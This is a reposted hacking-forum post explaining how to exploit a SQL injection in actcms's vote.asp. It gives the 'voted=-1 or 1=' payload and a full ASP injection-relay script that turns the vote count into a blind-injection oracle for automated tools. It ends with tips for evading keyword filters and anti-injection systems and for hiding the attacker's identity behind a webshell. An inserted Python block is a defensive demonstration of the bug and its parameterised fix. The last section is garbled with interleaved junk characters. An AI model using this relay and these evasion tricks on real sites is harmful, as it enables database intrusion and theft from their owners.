I saw an article on ninty's blog:
http://www.forjj.com/?action=show&id=80
On exploiting the actcms vulnerability, by 3x, QQ: 381862589
Please credit the above when reposting.
Vulnerable file:
/plus/vote/vote.asp
Code:
if request("voted").count=0 then
    response.write "<script>alert('请选择投票项目。');window.close()</script>"
    response.end
end if
for i=1 to request("voted").count
    ' the selected option id goes straight into the SQL string
    actcms.actexe("Update vote_act set VoteNum=VoteNum+1 where id="&request("voted")(i))
next
....
response.Redirect "index.asp?id="&id&""
After voting it redirects back to index.asp, the vote results page.
If the vote succeeds the count goes up by 1;
if it fails the count stays the same.
As shown:
[Screenshot attachment (3.95 KB), 2009-12-27 13:20: http://www.t00ls.net/attachments/month_0912/091227132032ef432aa12b1267.jpg]
We use this point to inject. ninty works in Java, but the Java runtime environment really is... never mind.
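The following is an added example, not code from this post or from actcms: it rebuilds the UPDATE from vote.asp over an in-memory SQLite table (constructed sample rows, assumed schema) to show why the post's "-1 or 1=" payload moves the counter for every row or for none, and the validated, parameterised form of the same update that never lets the payload reach SQL.

```python
import sqlite3

# Constructed sample rows standing in for actcms' vote_act table (assumed schema).
SEED_ROWS = [(1, 0), (2, 0), (3, 0)]  # (id, VoteNum)


def fresh_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE vote_act (id INTEGER PRIMARY KEY, VoteNum INTEGER)")
    con.executemany("INSERT INTO vote_act VALUES (?, ?)", SEED_ROWS)
    return con


def vote_vulnerable(con, voted):
    """Mirrors vote.asp: the raw 'voted' value is glued onto the UPDATE."""
    sql = "UPDATE vote_act SET VoteNum=VoteNum+1 WHERE id=" + voted
    return con.execute(sql).rowcount  # rows incremented


def vote_hardened(con, voted):
    """Same update, but 'voted' must be a plain option id and is bound as a parameter."""
    if not voted.isdigit():
        raise ValueError("voted must be a numeric option id")
    cur = con.execute("UPDATE vote_act SET VoteNum=VoteNum+1 WHERE id=?", (int(voted),))
    return cur.rowcount


def total_votes(con):
    return con.execute("SELECT SUM(VoteNum) FROM vote_act").fetchone()[0]


def demo():
    con = fresh_db()
    normal = vote_vulnerable(con, "2")              # one honest vote: 1 row
    # The post's payload shape 'voted=-1 or 1=<expr>': no option has id -1, so the
    # number of rows incremented depends only on <expr>. That is why the relay script
    # can read the vote count from index.asp before and after and treat "unchanged"
    # as false, and why a multithreaded tool racing on the same counter gets confused.
    true_case = vote_vulnerable(con, "-1 or 1=1")   # every row: 3
    false_case = vote_vulnerable(con, "-1 or 1=2")  # no row: 0

    con2 = fresh_db()
    try:
        vote_hardened(con2, "-1 or 1=1")
        rejected = False
    except ValueError:
        rejected = True                             # payload never reaches SQL
    ok = vote_hardened(con2, "2")
    return normal, true_case, false_case, rejected, ok, total_votes(con2)


if __name__ == "__main__":
    print(demo())  # (1, 3, 0, True, 1, 1)
```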
We use an injection relay to carry out this injection. The code is as follows:
First generate jmget.asp with 寂寞的刺猬's injection relay tool.
Injection URL: http://localhost/actcms/plus/vote/vote.asp
Injection key/value: id=1&voted=-1 or 1=   ' substituting it this way is the clever part: there is no need to work out which vote options exist
Then modify it into the following code:
Code:
<%
JmdcwName=request("jmdcw")
' Injection relay, GET version, by 寂寞的刺猬 [L.S.T]
JmStr="id=1&voted=-1 or 1="&JmdcwName
JmStr=URLEncoding(JmStr)
JMUrl="http://localhost/actcms/plus/vote/vote.asp"
testurl="http://localhost/actcms/plus/vote/index.asp"
testurl=testurl & "?" & JmStr
JMUrl=JMUrl & "?" & JmStr
JmRef="http://localhost/actcms/plus/vote/vote.asp"
JmCok="ASPSESSIONIDAQACTAQB=HKFHJOPDOMAIKGMPGBJJDKLJ;"
JmCok=replace(JmCok,chr(32),"%20")
test1=getSt(PostData(testurl,JmStr,JmCok,JmRef)) ' vote count before voting; getSt returns the vote count
re=PostData(JMUrl,JmStr,JmCok,JmRef) ' cast the vote
test2=getSt(PostData(testurl,JmStr,JmCok,JmRef)) ' vote count after voting
response.write test1&""&test2&""
if test1=test2 then ' if the counts before and after are equal, it failed
    response.write "failed"
else
    response.write "succeed"
end if
response.write "by 3x"

' Fetch a URL with the given cookie and referer and return the body as a string
Function PostData(PostUrl,PostStr,PostCok,PostRef)
    Dim Http
    Set Http = Server.CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET",PostUrl,False
        .SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
        .SetRequestHeader "Referer",PostRef
        .SetRequestHeader "Cookie",PostCok
        .Send ()
        PostData = .ResponseBody
    End With
    Set Http = Nothing
    PostData =bytes2BSTR(PostData)
End Function

' Convert a raw byte response into a VBScript string (double-byte characters kept intact)
Function bytes2BSTR(vIn)
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, I, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn, I + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            I = I + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

' Percent-encode double-byte characters, spaces and '+'; ASCII is passed through
Function URLEncoding(vstrin)
    Dim i, ThisChr, InnerCode, Hight1, Low1, strReturn
    strReturn=""
    For i=1 To Len(vstrin)
        ThisChr=Mid(vstrin,i,1)
        if Abs(Asc(ThisChr))< &HFF Then
            strReturn=strReturn & ThisChr
        Else
            InnerCode=Asc(ThisChr)
            If InnerCode<0 Then
                InnerCode=InnerCode + &H10000
            End If
            Hight1=(InnerCode And &HFF00) \ &H100 ' high byte
            Low1=InnerCode And &HFF ' low byte
            strReturn=strReturn & "%" & Hex(Hight1) & "%" & Hex(Low1)
        End if
    Next
    strReturn=Replace(strReturn,chr(32),"%20") ' convert spaces; if the site filters spaces, try /**/ in place of %20
    strReturn=Replace(strReturn,chr(43),"%2B") ' JMDCW added conversion of the + character
    'strReturn=Replace(strReturn,filtered character,"replacement") ' add further characters to convert here
    URLEncoding=strReturn
End Function

' Extract the vote count that index.asp prints after "投票人数:"
function getSt(body)
    startpot=instr(body,"投票人数:")+len("投票人数:")
    endpot=instr(startpot,body," ")
    getSt=mid(body,startpot,endpot-startpot)
end function
%>
The injection URL is then http://localhost/vote.asp?jmdcw=1   ' I renamed jmget.asp to vote.asp
Test the result:
Vote succeeded:
[Screenshot attachment (15.4 KB), 2009-12-27 13:29: http://www.t00ls.net/attachments/month_0912/091227132987c71b583da9fb1a.jpg]
Vote failed:
[Screenshot attachment (13.72 KB), 2009-12-27 13:29: http://www.t00ls.net/attachments/month_0912/09122713294089aca533bb1d18.jpg]
-------------------------------------------------------------------------------
One more note... I found that running this through tools like 明小子 does not work... I worked out the reason: injection tools like 明小子 are multithreaded, and this vote-count variable has no locking mechanism... so
sorry... you can only inject with a single-threaded tool.....
so it fails... my apologies...
-------------------------------------------------------------------------------
7 l" L9 I! W% I) m! ~ x7 L+ U注入中转的一些其他应用
/ `& N. d# ~- m: G [其实寂寞的刺猬大牛给我们提供这款基于xmlhttp的傻瓜式中转工具实在是太方便我们小菜了
, X# M3 z. |5 t$ ^1.普通的get型的注入点如果中转一下,放到我们的webshell上跑,有效的隐藏我们的id6 i6 e% F! x; j2 O T
2.post注入转成get型的注入,方便我们使用工具来跑5 z! N/ q { p6 K' C( g2 d
3.在一些cms或者一流拦截系统,过滤了selelct等关键词,这里的过滤指的是replace,我们可以在代码中进行转化,replace(jmstr,"select","sselectelect"),这样我们就可以用工具了,对于一流拦截的突破就replace(jmstr,"%20","%09")
' R# _' U! t% G }4.在某些防注入系统中的突破,上次我遇到一个防注入,大家应该也很熟悉,可以通过id--->%69d来绕过,但是如果是post的呢?我把他中转成get型的,但是注入键值我改成%69d=,成功绕过: {# G5 ~- u3 h' H
1 K! G' p9 I/ {* ], k& y% E |